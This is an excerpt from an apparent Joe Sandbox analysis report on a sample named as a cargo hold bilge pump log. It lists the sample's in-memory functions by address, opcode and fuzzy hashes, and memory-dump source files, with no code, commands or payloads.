Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b60a8e9fb68690275219d3b20ecf0f9c0868b4a0d22885d2490400eb86b7f0dc
Instruction ID: e26da62d42ee4fdfb043c0739eb50c4ef6d87c09acd2167f71dc9213b569c0f5
Opcode Fuzzy Hash: b60a8e9fb68690275219d3b20ecf0f9c0868b4a0d22885d2490400eb86b7f0dc
Instruction Fuzzy Hash: 3701A232B102286B9B059E599800BAF7FAFEBC9750F148029F905D72C0DA71DD119BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A0D7FD Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043653803.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0d000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87823d9aa66d3ef3def035652f0d802e4c8265dd176be02db12aa3128b3ded15
Instruction ID: 3ef195915a088a2ff803df025c7d9cf4e4e329cd0e67e2daf002323e3181aa5b
Opcode Fuzzy Hash: 87823d9aa66d3ef3def035652f0d802e4c8265dd176be02db12aa3128b3ded15
Instruction Fuzzy Hash: 2D012B324083089AE7104FA6DD84767BFECEF51724F18C429ED094B1C6C338D848C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 05C77218 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331f41b841248800a87f7285b8087e4519ae0620e7092b91b804e1c4263c0784
Instruction ID: 2c84f2f1c8ed7f05978a8c12ec4e758b99f7e908255cbda43a574b446d0e04e3
Opcode Fuzzy Hash: 331f41b841248800a87f7285b8087e4519ae0620e7092b91b804e1c4263c0784
Instruction Fuzzy Hash: FE016531200B114FD724DF29D51460BBBE6EB84325F108B2DE45A877E4DF71A94A8F90

Uniqueness

Uniqueness Score: -1.00%

Function 0252B2C8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f259827870928a65b4e0272ac0ffb4756a88c6555863a5c2c47e6c5de4ad7e0
Instruction ID: a15735fd207f5470713e94f1a00c8bb16c5b007ad3a9fb5b7a36276dbfa91322
Opcode Fuzzy Hash: 3f259827870928a65b4e0272ac0ffb4756a88c6555863a5c2c47e6c5de4ad7e0
Instruction Fuzzy Hash: 8B01DC73A042186BDB019E55D810BAF7FAAEBC8350F188026FA04D72C0DA31D8129BA4

Uniqueness

Uniqueness Score: -1.00%

Function 073495F1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f8a7dda57693e8aeade614957912c6a8df2353d444b190d429ff384294eadb
Instruction ID: 2d7728f76377975fa4b06d29b08c5fea7377b883052784a67a8321e2af40fc97
Opcode Fuzzy Hash: a8f8a7dda57693e8aeade614957912c6a8df2353d444b190d429ff384294eadb
Instruction Fuzzy Hash: 81F0F9B41183819FF7155B70FC183963F61FB0326474801D6D886D92F7CB2CA842CB11

Uniqueness

Uniqueness Score: -1.00%

Function 05C719EF Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0734f25532f2f1a88195d6093861548a8d7cc8d7eb9c486095f97105b2be8d
Instruction ID: a08a58668d7ee66c327a26dc41529f19151e990999912684051275e6897ee86e
Opcode Fuzzy Hash: 7b0734f25532f2f1a88195d6093861548a8d7cc8d7eb9c486095f97105b2be8d
Instruction Fuzzy Hash: CBF0C230304A118FD7149B3ED844E393BAAAF85A35B080069E816CB7B2DF61DC42C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05C71A00 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaa0a00d6ac9c8ff965cf75a494a605c9f1f111a926b6f6f2f971a258d31d1ed
Instruction ID: 48d353cac2961fabe6c3e2350926e056d97e154446dff56c7506f8d770eef398
Opcode Fuzzy Hash: aaa0a00d6ac9c8ff965cf75a494a605c9f1f111a926b6f6f2f971a258d31d1ed
Instruction Fuzzy Hash: 4EF09031304A258B9758DA3FC844D3A33EBAF85A613080479E816C7761EE60DD42D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0252D80C Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05bb8c79955735f453feeadeb2fb4b1960ff6362358c04f74188f1e0641ce367
Instruction ID: 99c617e861d41aa11813dc7ab40bba129f7b720feca01c0d8a35e6645e57e893
Opcode Fuzzy Hash: 05bb8c79955735f453feeadeb2fb4b1960ff6362358c04f74188f1e0641ce367
Instruction Fuzzy Hash: A7F0A43120521147DB00AF6DD8A0796B7A6FBC9330F104675EA096F3C6DB71684987A4

Uniqueness

Uniqueness Score: -1.00%

Function 0252DFD8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6e583d7a689e8f5921afa1d3248e31c4c8643fe022a6538a6c389fb181630b0
Instruction ID: 59e4818e386fe1fe1941215d74d565ea5dc52d46a20532db37a79f2fe93b5a80
Opcode Fuzzy Hash: e6e583d7a689e8f5921afa1d3248e31c4c8643fe022a6538a6c389fb181630b0
Instruction Fuzzy Hash: 9D01A2312052414BDB11AF68A8A0796BB76FFC9320F1442B9DA486F2C7CB6558498BA4

Uniqueness

Uniqueness Score: -1.00%

Function 05C7AC23 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 271facca5e36f40f16a9f8f60e4651f3fa61518539bd0eba63a79c3ae1ec34ce
Instruction ID: 4ebff0ec908be9473553182e7b9c2a65878d1feaf6753785827fed81c264840c
Opcode Fuzzy Hash: 271facca5e36f40f16a9f8f60e4651f3fa61518539bd0eba63a79c3ae1ec34ce
Instruction Fuzzy Hash: 5EF0AF32204648CFC714AF38E85496D7BB2FF85306B1409AAE0068B771DB36D989DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00A0D7FC Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043653803.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0d000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e190f39b27153af18e73b72d61a8617f9d63e08e85d5710a47e4b2a7d6e23f2c
Instruction ID: 9c5c309e074dc34a69f80583819053da0df8092ac3ce7dec28252a3ceff7c3ef
Opcode Fuzzy Hash: e190f39b27153af18e73b72d61a8617f9d63e08e85d5710a47e4b2a7d6e23f2c
Instruction Fuzzy Hash: 0FF062724043449EE7108F16D884B62FFA8EB55734F18C45AED485B296C279A844CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05C7B9A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eab3036f250d2e73103e3ff08ee9ac533fdd84eb3b92c615a19491f01a40007b
Instruction ID: 52715ca2602b559e3f905d7b8bcba29f8c95ed7399282b082da7889d8d0df3d1
Opcode Fuzzy Hash: eab3036f250d2e73103e3ff08ee9ac533fdd84eb3b92c615a19491f01a40007b
Instruction Fuzzy Hash: 41F0BE307402088FC624A67A8944BBB77EAEFC0624F080869D15BCB764EE34EC45C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 02525670 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a180229aae6ffbe0a403542a84888324c05f74222cb1dddb89738edd585b7a
Instruction ID: 9db346a4cf90574800541cfb0f3845d58c3341fb427457dd718b164ee4663a96
Opcode Fuzzy Hash: c2a180229aae6ffbe0a403542a84888324c05f74222cb1dddb89738edd585b7a
Instruction Fuzzy Hash: 4AF0A07AD002269B4B00DAB9D8013EFBBA4AA84651B414032D466EB380E630E916CFF0

Uniqueness

Uniqueness Score: -1.00%

Function 05C7B993 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d090c0113181f5e621a7f408d100ec607a72eb3c1b990e047db22d8093c6c050
Instruction ID: 315467f9b9bf4830674f50e9e7b1128b1dc36ab078052bb89f21c03a934f88fa
Opcode Fuzzy Hash: d090c0113181f5e621a7f408d100ec607a72eb3c1b990e047db22d8093c6c050
Instruction Fuzzy Hash: 4DF0B4313106048FC720AA29C844B7B37E6EFC0365F080869D156CB7A0EE75DC45C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 05C7B5B9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84dc0245dc262dacf3b203b931ee6b5761b428f3f428e71719089d72960270e7
Instruction ID: 130710b79898d8e97c749b1128f2c9c5472cdbccb3366366445e04105c41c029
Opcode Fuzzy Hash: 84dc0245dc262dacf3b203b931ee6b5761b428f3f428e71719089d72960270e7
Instruction Fuzzy Hash: BA019235600108CFCB54DF68C58499877B1FF48325F254595E906AB7A1D732EE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05C70590 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee871c51118e194664d999ea63bc8b9cc839dced194e642c49a6669823f280d4
Instruction ID: 70ea5fbaf1ce85d1437dbacdf78347b25e39b60adb39985b6cd7141ed1c5fc7e
Opcode Fuzzy Hash: ee871c51118e194664d999ea63bc8b9cc839dced194e642c49a6669823f280d4
Instruction Fuzzy Hash: 17E09233691634CBC700EF48F4914B6B3B8FB846693188456E40CCAA10E337D862D7C8

Uniqueness

Uniqueness Score: -1.00%

Function 02525074 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ebd1eed4f86533571df16548815b498abd662bf768d5aa31f6cb249fb9ec461
Instruction ID: 8126db8520a63093668ef88fd29cf82c8b84d3e3bd4dc03f339923685f578a97
Opcode Fuzzy Hash: 1ebd1eed4f86533571df16548815b498abd662bf768d5aa31f6cb249fb9ec461
Instruction Fuzzy Hash: 17E0862135563123E504316C985177B959BE7C6F31F10452AA706966D6CCD19C4D07D9

Uniqueness

Uniqueness Score: -1.00%

Function 05C77080 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25d36bdeb380c81baf15a213746c18731835779a23da847a303f5b2ad3e4957
Instruction ID: 37d470382c8dee6b627b3cc51afcbd12e7f7c71e4ef8b6413ca89cbc05d6a827
Opcode Fuzzy Hash: a25d36bdeb380c81baf15a213746c18731835779a23da847a303f5b2ad3e4957
Instruction Fuzzy Hash: A3E026313002405BD304272EA41835EBE9EEBE6326F04406AF40AC3390CFE90C4187E2

Uniqueness

Uniqueness Score: -1.00%

Function 05C72914 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40cfe59af030f57dc36cc02b372fe7991daf93ec7d3b19a8d79aba9bf9bcf933
Instruction ID: 0da5fcaafff9db6deb1fb1244b136dd4bb113283a568695ef5463e4c83813982
Opcode Fuzzy Hash: 40cfe59af030f57dc36cc02b372fe7991daf93ec7d3b19a8d79aba9bf9bcf933
Instruction Fuzzy Hash: 36E04F322840189FCB15E71CC5C8BE977A5FB4A354F1989B3F55AEB729C275A8828740

Uniqueness

Uniqueness Score: -1.00%

Function 07349631 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 282b9cdf2c1a59c455422ce4177e4a65aa4ac6b38b239af23d90d3353715c411
Instruction ID: 943556b6f4a09dc0bb127ed39be3ebd32dfe39207f6b64faf5b149f10dfb0675
Opcode Fuzzy Hash: 282b9cdf2c1a59c455422ce4177e4a65aa4ac6b38b239af23d90d3353715c411
Instruction Fuzzy Hash: 63E01AB9554242AFF7285B30FA0C75A3B66FB0626971801A8E94AD12B6DB28E8018A11

Uniqueness

Uniqueness Score: -1.00%

Function 05C705D8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c53e9d72b7245e4df191ee223d3fcf9e1e838db42e29da4c5c1ab71875980d3b
Instruction ID: 0fd8cdb1c7afb2f4bd67c767ffda37fa48f0df8c220f901346173cd8c7c2384d
Opcode Fuzzy Hash: c53e9d72b7245e4df191ee223d3fcf9e1e838db42e29da4c5c1ab71875980d3b
Instruction Fuzzy Hash: 69E02C33980228AFE710A7ADD08CB9037A8E300360F428A20E940B3A40C3AEEC804FD5

Uniqueness

Uniqueness Score: -1.00%

Function 05C71771 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7628ca983e1687db0318bc3ad44889a9fb1b16fa9083852624bb5a10cd443805
Instruction ID: 4279feab38aae0828267441a850c875c9baef8d93f87e7382fe506bdd34eb188
Opcode Fuzzy Hash: 7628ca983e1687db0318bc3ad44889a9fb1b16fa9083852624bb5a10cd443805
Instruction Fuzzy Hash: E5D02B72719A6007DB063728682A33D3B458BC1311F084469D00B8F2D1DD4C0E4287E7

Uniqueness

Uniqueness Score: -1.00%

Function 05C77090 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3129397d8713f832ebbbdb7a3c0d6a7f24ffae838c22a4c213edabd41c81c619
Instruction ID: 1cf3fde207c67c3fc6f651ef61e168b6e94b9adba6ae2daca5a46c64983720cc
Opcode Fuzzy Hash: 3129397d8713f832ebbbdb7a3c0d6a7f24ffae838c22a4c213edabd41c81c619
Instruction Fuzzy Hash: 8FD05E323002184B8644366EA01859EBB9FEBC8621B04402AF50AC3394CEA55C8246E6

Uniqueness

Uniqueness Score: -1.00%

Function 0252A518 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: d28480c1aec483fc8dfb3576611ce3c9083a48c4b532b35d4d43d0a87e375abd
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 52C08C3760C1382AAA38104E7C40EA7BF8CE3C23B4A210137F91CC33C09842AC8941FC

Uniqueness

Uniqueness Score: -1.00%

Function 05C71780 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2c272e0d53f8fe58a88c574b56f62567a4597e8b764d3bae7829256c9a8e5b
Instruction ID: cf75eff80c184044037f43c7a5809f819df2ff94a9b6f71cdb345078d50a5d3c
Opcode Fuzzy Hash: dd2c272e0d53f8fe58a88c574b56f62567a4597e8b764d3bae7829256c9a8e5b
Instruction Fuzzy Hash: DAD0127671493403CF1A3759642A27DB78EDFC1A107088479D10B8B690DE4D6F5242EF

Uniqueness

Uniqueness Score: -1.00%

Function 0252A6E5 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc90e114e648cdfe2dc8d756a2bca6a6f0430c2a1f503f73270da8d5d8739b85
Instruction ID: afe49100198f145354bfa1a2af7b746dd9473f75e7591e36cbd4588fc84e22ee
Opcode Fuzzy Hash: dc90e114e648cdfe2dc8d756a2bca6a6f0430c2a1f503f73270da8d5d8739b85
Instruction Fuzzy Hash: FCD0673AB40018DFCF059F99E8409DDF7B6FB98221B148116E915A3261C631A921DB64

Uniqueness

Uniqueness Score: -1.00%

Function 02527611 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3b1d4a2f868ff3f428f50e6e86b144a0a43f28505b32d8a92989ffdbc70695
Instruction ID: 33c464cfcbd5812dd7626e669aed6b4521194ef2e6983b941d9fbd44edf69603
Opcode Fuzzy Hash: 7b3b1d4a2f868ff3f428f50e6e86b144a0a43f28505b32d8a92989ffdbc70695
Instruction Fuzzy Hash: F6D05E311483899FD702F338F8506577B3E9F84304B019671A24A4B26FDBA89D998794

Uniqueness

Uniqueness Score: -1.00%

Function 0252BEA7 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95324d4d15df64747ef077d0c8c71738bf948be343b496a55d3f12bdcbec5703
Instruction ID: 7ee8d7564c1641800b448d07663ea282e5e617e387ad9c1041864ea4a0a17be1
Opcode Fuzzy Hash: 95324d4d15df64747ef077d0c8c71738bf948be343b496a55d3f12bdcbec5703
Instruction Fuzzy Hash: 5FD0C735B44104478B04A7B9659429DBBE7F7C41357108C56D545D3398DA30485597A1

Uniqueness

Uniqueness Score: -1.00%

Function 0734D8F0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a8e9e3af4f4c0a5242110f38535543ef73fc473ad82ce836f896a2beb2a92a
Instruction ID: 064a757b45dd440f9663c1171f71a54641f62af8a2692226eb1d69a079059de7
Opcode Fuzzy Hash: 12a8e9e3af4f4c0a5242110f38535543ef73fc473ad82ce836f896a2beb2a92a
Instruction Fuzzy Hash: E1C09BD640DF881BD242161588911C67FB2F51F95039D02C7C184C7153E01F551AD356

Uniqueness

Uniqueness Score: -1.00%

Function 02527620 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2d3ffbdce5160eb459c3b7300ad6e94b5ebe2498432dfd8ab7eb0d91dc7998
Instruction ID: f27c7330c4468e07907f0e4eacc22c074c87c204ca8fac5c51a952bf24e131a3
Opcode Fuzzy Hash: 2a2d3ffbdce5160eb459c3b7300ad6e94b5ebe2498432dfd8ab7eb0d91dc7998
Instruction Fuzzy Hash: 9FC012340443098ECB01F769F945A5AB73EEA843047509730A1090B26EDFB49D994690

Uniqueness

Uniqueness Score: -1.00%

Function 025245C1 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90da0fb13398875fcdbe1aad05b5536b6435fb7dc985df2ca88cb118f74c67d
Instruction ID: c69ae2f46484504a15ab488df4ec956d3341269e3545a891f0a9f47f14008c5e
Opcode Fuzzy Hash: e90da0fb13398875fcdbe1aad05b5536b6435fb7dc985df2ca88cb118f74c67d
Instruction Fuzzy Hash: C6C048A0A0AB801FEB025261962438D6F289892204B1640E3D5DA8B263D608AC068B32

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05C7E1A8 Relevance: 11.0, Strings: 8, Instructions: 968COMMON

Download Yara Rule

Strings

Hbq, xrefs: 05C7E679
(bq, xrefs: 05C7E375
Hbq, xrefs: 05C7E838
PH^q, xrefs: 05C7E349
Hbq, xrefs: 05C7EA3C
Hbq, xrefs: 05C7EC5A
Hbq, xrefs: 05C7EA9B
Hbq, xrefs: 05C7E61A

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
API String ID: 0-3076519024
Opcode ID: 209596990a96a5643b8ab5298b1bd9937048ed35d5c5d64856d0be6066fad48a
Instruction ID: b83b51da3f32adddbd680302bbc9cbb285a2ccc46aadc95a23a9eb0556c2490c
Opcode Fuzzy Hash: 209596990a96a5643b8ab5298b1bd9937048ed35d5c5d64856d0be6066fad48a
Instruction Fuzzy Hash: F5729E327001188FCB54EB78C854B6E7BABFF89350F248969E10ADB3A5DE34DD468791

Uniqueness

Uniqueness Score: -1.00%

Function 07375DF0 Relevance: 3.3, Instructions: 3301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047554865.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 517ca7522f8c62f0c39729b52d85eaca0bed982d216c8e592f5f5a6091fd467f
Instruction ID: fca9f0bd14e6c7b127f6b39731c9e35029663ed9dc61b1d8ee458fe237969cbf
Opcode Fuzzy Hash: 517ca7522f8c62f0c39729b52d85eaca0bed982d216c8e592f5f5a6091fd467f
Instruction Fuzzy Hash: 81537E70A14228CBD714FF79D88979DBBB5BB88704F4085E9D488A7340DE386E85CF96

